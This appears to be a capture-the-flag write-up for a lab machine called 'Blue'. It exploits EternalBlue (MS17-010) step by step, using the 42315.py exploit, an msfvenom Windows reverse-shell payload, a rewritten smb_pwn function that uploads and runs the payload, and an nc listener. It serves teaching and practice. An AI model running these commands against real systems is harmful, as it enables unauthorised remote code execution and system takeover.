Blue

As the name of the machine suggests, it's time to use Eternal Blue to access root privileges on the machine! This would be trivial to do with Metasploit and even without Metasploit using the correct exploit is not that difficult!

First off let's use searchsploit to find an exploit to use:

searchsploit eternalblue

There should be results like this:

searchsploit-eternalblue

You could try your luck with the other ones too but let's go with the second one:

searchsploit -m 42315.py

Now the exploit is copied to current directory. Unfortunate thing is that some libraries that the exploit uses are written on python2 so let's use that! We need to install some dependencies before using it though:

 pip install impacket
 wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py

After installing packages there's some changes that we need to do for this exploit to work. First off let's change USERNAME and PASSWORD variables on line 36 to some random strings since NULL session is available via smb, for example:

USERNAME = 'user'
PASSWORD = 'user'

Now we have everything ready to test the exploit! Run the following script with target's ip address:

python 42315.py <ip-address>

You should see matching message:

testing-exploit

This is nice and all, but It doesn't help with actually rooting the machine so let's modify the part where the pwned.txt file is created and sent to target!

First, let's generate a shell payload with msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=<your-ip-address> LPORT=9005 -f exe > shell.exe

Then, replace smb_pwn-function (line 914-) with this:

def smb_pwn(conn, arch):
  smbConn = conn.get_smbconnection()
  smb_send_file(smbConn, 'shell.exe', 'C', '/test.exe')
  service_exec(conn, r'c:\test.exe')

The change is pretty self evident, we send our just generated shellcode via smb as text.exe, and then execute it!

Next, let's start our Netcat-listener:

nc -lnvp 9005

And finally, run the script one last time, and we have a root shell!

root-shell